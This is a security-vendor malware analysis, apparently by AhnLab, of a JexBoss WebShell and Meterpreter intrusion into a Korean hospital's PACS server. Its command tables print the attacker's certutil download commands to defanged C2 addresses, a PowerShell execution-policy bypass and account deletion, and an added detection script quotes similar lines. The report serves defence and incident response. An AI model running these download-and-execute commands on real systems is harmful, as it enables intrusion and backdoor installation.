Meterpreter Distributed to Vulnerable Server of Korean Medical Institution

While monitoring malware strains distributed to vulnerable servers, the ASEC analysis team discovered an attack against a PACS (Picture Archiving and Communication System) server used by a Korean medical institution.

PACS is a system for digitally storing, managing, and transferring patients’ medical images so that they can be viewed and interpreted regardless of time and location.

This system is therefore used by many hospitals. As there are multiple PACS vendors, each medical institution may use a different PACS product.

The case presented in this article was an attack against a product whose server is built on a Java-based open-source application called ‘dcm4che’.

Figure 1. Official website of ‘dcm4che’ (https://www.dcm4che.org/)

dcm4che is an open-source program that supports the processing of medical images by handling their conversion and management. It provides a web interface for administration and allows the user to set up a PACS server without much difficulty. The web container used in the process is JBoss Application Server.

The attacker targeted a vulnerable JBoss Application Server using a tool called ‘JexBoss’.

Figure 2. Vulnerable JBoss Application Server confirmed via Shodan (https://www.shodan.io/)

JexBoss (JBoss Verify and EXploitation tool) is a vulnerability exploitation tool available on GitHub. Its targets include JBoss Application Server as well as various other Java platforms, frameworks, and applications. JexBoss supports vulnerability scanning of the Java-based environments mentioned above. If a vulnerability is found, it can exploit it and install a WebShell to gain control of the system.

Figure 3. JexBoss on GitHub (https://github.com/joaomatosf/jexboss)

As JexBoss is an open-source program, it is used by many different attackers because of its accessibility. In 2016, for instance, the SamSam ransomware group exploited JBoss servers that had not been patched against the vulnerability and installed ransomware on them.

[Reference] Ransomware Attack Case in 2016

In the case presented in this post, the attacker installed a WebShell using JexBoss and, after reconnaissance, ultimately installed the Meterpreter backdoor.

An attacker can take over the system with the JexBoss tool if the JBoss environment still uses the default account credentials or runs an older version to which the vulnerability patch has not been applied. JexBoss scans the supplied address, reports the result, and installs a WebShell with little effort.

Figure 4. Log of installing a WebShell using JexBoss (Source: JexBoss GitHub)

After scanning with JexBoss, the attacker can launch a vulnerability attack based on the scan results. The image below shows AhnLab’s ASD log of the attacker installing a WebShell on the system through a vulnerability attack supported by JexBoss. The vulnerable ‘javaservice.exe’ process fetches the WebShell from the URL provided by JexBoss. The WebShell is packaged inside a WAR file, which is a Java web application archive.

Figure 5. Log of WebShell being installed via JexBoss

The JSP WebShell executes the commands it receives from the attacker on the infected system via ‘cmd.exe’ or ‘bash’, depending on the OS (Windows or Linux).

Figure 6. JSP WebShell installed in the infected environment

After the WebShell was installed, the attacker entered commands through it. The net command was used to obtain the list of user accounts in the infected environment and to remove the user named ‘smoke’. The attacker then used the tasklist command to check the list of currently running processes.

Date | Execution Path and Command | Description
June 21st, 2022 11:24 | (JexBoss) d:\pacs\dcm4chee-mysql-2.14.5\server\default\tmp\%ASD%\tmp2292506501108616935jexws4.war | Downloads WebShell
June 21st, 2022 11:25 | %SystemRoot%\syswow64\net.exe > net user | Lists user accounts
June 21st, 2022 11:25 | %SystemRoot%\syswow64\net.exe > net user smoke /del | Deletes the ‘smoke’ account
June 21st, 2022 11:26 | %SystemRoot%\syswow64\tasklist.exe > tasklist | Lists running processes
Table 1. Commands performed by the attacker (1)

The attacker then made the following attempts to install Meterpreter. The table below is a log of the attacker abusing certutil.exe to download Metasploit stagers in PE (executable) and PowerShell script form.

Time | Path and Command | Description
June 21st, 2022 11:28 | %SystemRoot%\syswow64\certutil.exe > -urlcache -split -f “hxxp://62.138.7[.]234:2468/de4444.bat” de.bat | (Unconfirmed)
June 21st, 2022 11:29 | %SystemRoot%\syswow64\certutil.exe > -urlcache -split -f “hxxp://62.138.7[.]234:2468/de4444.exe” w.exe | Downloads Meterpreter stager (PE executable)
June 21st, 2022 11:32 | %SystemRoot%\syswow64\certutil.exe > -urlcache -split -f “hxxp://34.220.245[.]178/de.ps1” w.ps1 | Downloads Meterpreter stager (PowerShell script)
June 21st, 2022 11:32 | %SystemRoot%\syswow64\windowspowershell\v1.0\powershell.exe > -executionpolicy bypass -noexit -file w.ps1 | Attempts to download Meterpreter stager (PowerShell script)
Table 2. Commands performed by the attacker (2)
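As an added example (not code from the original article or from AhnLab), the following Python script applies the detection logic a defender would derive from Tables 1 and 2 to constructed, tab-separated process events: a JBoss host process spawning OS utilities (how the JSP WebShell runs commands), certutil download syntax, account deletion via net, and a PowerShell execution-policy bypass. The event format, the javaservice.exe path, the WEB_CONTAINERS list and the attacker.invalid host are assumptions, not ASD log fields or values from the post.

```python
import re
from collections import Counter

# Assumed JBoss host process names and the OS utilities a JSP WebShell spawns.
WEB_CONTAINERS = ("javaservice.exe", "java.exe")
SUSPICIOUS_CHILDREN = ("cmd.exe", "net.exe", "net1.exe", "tasklist.exe", "certutil.exe", "powershell.exe")

# Command-line rules, matched against the lowercased command line.
RULES = [
    ("certutil_download", re.compile(r"certutil.*-urlcache.*-f\s+\S*https?://")),
    ("net_user_delete", re.compile(r"\bnet1?\s+user\s+\S+\s+/del\b")),
    ("powershell_bypass_file", re.compile(r"powershell.*-executionpolicy\s+bypass.*-file\s+\S+")),
]

def scan_line(line):
    """Return (rule_name, time) findings for one tab-separated event line."""
    time, parent, image, cmdline = line.rstrip("\n").split("\t", 3)
    parent_name = parent.lower().rsplit("\\", 1)[-1]
    image_name = image.lower().rsplit("\\", 1)[-1]
    findings = []
    # A JBoss host process spawning an OS utility is how the WebShell runs attacker commands.
    if parent_name in WEB_CONTAINERS and image_name in SUSPICIOUS_CHILDREN:
        findings.append(("webshell_child_process", time))
    low = cmdline.lower()
    findings.extend((name, time) for name, rx in RULES if rx.search(low))
    return findings

def scan_log(text):
    """Scan every non-empty line and concatenate the findings in log order."""
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]

def summarize(findings):
    """Count findings per rule name."""
    return dict(Counter(name for name, _ in findings))

# Constructed sample events (time, parent image, child image, command line) modelled on
# Table 1 and Table 2; the javaservice.exe path and attacker.invalid host are placeholders.
WEB = r"D:\pacs\dcm4chee-mysql-2.14.5\bin\javaservice.exe"
SW = r"%SystemRoot%\syswow64"
SAMPLE_EVENTS = [
    ("2022-06-21 11:25", WEB, SW + r"\net.exe", "net user"),
    ("2022-06-21 11:25", WEB, SW + r"\net.exe", "net user smoke /del"),
    ("2022-06-21 11:26", WEB, SW + r"\tasklist.exe", "tasklist"),
    ("2022-06-21 11:29", WEB, SW + r"\certutil.exe",
     'certutil -urlcache -split -f "http://attacker.invalid:2468/de4444.exe" w.exe'),
    ("2022-06-21 11:32", WEB, SW + r"\windowspowershell\v1.0\powershell.exe",
     "powershell -executionpolicy bypass -noexit -file w.ps1"),
    ("2022-06-21 11:40", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
]
SAMPLE_LOG = "\n".join("\t".join(e) for e in SAMPLE_EVENTS)
```

Running `scan_log(SAMPLE_LOG)` flags every attacker row from the tables while the explorer.exe row produces nothing, which is the baseline a web-server host should show.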

‘de4444.exe’ is a Metasploit stager: a PE-format malware that connects to the C&C server, downloads the Meterpreter payload into memory, and executes it. Because a stager only needs to fetch the backdoor payload on demand, it is simple in form and small in size, which makes it convenient for attacks.

Figure 7. Stager malware (de4444.exe) downloading Meterpreter

Although ‘w.ps1’ could not be obtained, AhnLab’s ASD log indicates that it is a PowerShell-format stager. Its behavior is the same as that of the PE-format stager, so Meterpreter is executed in the memory of the powershell.exe process. The following log shows Meterpreter, loaded in the powershell process and then injected into the winlogon process, communicating with the C&C server.

Figure 8. Meterpreter ASD log

Meterpreter is a backdoor malware that receives the attacker’s commands from the C&C server and performs malicious actions. In other words, once Meterpreter is installed, the attacker can gain complete control over the infected system using the Metasploit framework.

Administrators should therefore change account credentials that are still set to their defaults and prevent vulnerability attacks by updating the server to the latest patched version. For servers exposed to the internet, external access should also be restricted with security products.

AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:

[Detection]

File Detection

  • Downloader/Win.Meterpreter
  • WebShell/JSP.Generic

Behavior Detection

  • Malware/MDP.Download.M1900

[IOC]

MD5

  • 3f156bd68b2a32a1b5cb03af318667f0 (jews.war)
  • acda46759d7c3526df2a6c59803586a4 (jexws4.jsp)
  • 8fe01532bfa9803f1a9b174289c2cbbc (de4444.exe)

URL & C2

  • 62.138.7[.]234:4444
  • hxxp://62.138.7[.]234:2468
  • hxxp://34.220.245[.]178/de.ps1
  • hxxp://62.138.7[.]234:5555

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Reference

https://www.dcm4che.org/
https://github.com/joaomatosf/jexboss
https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-312A
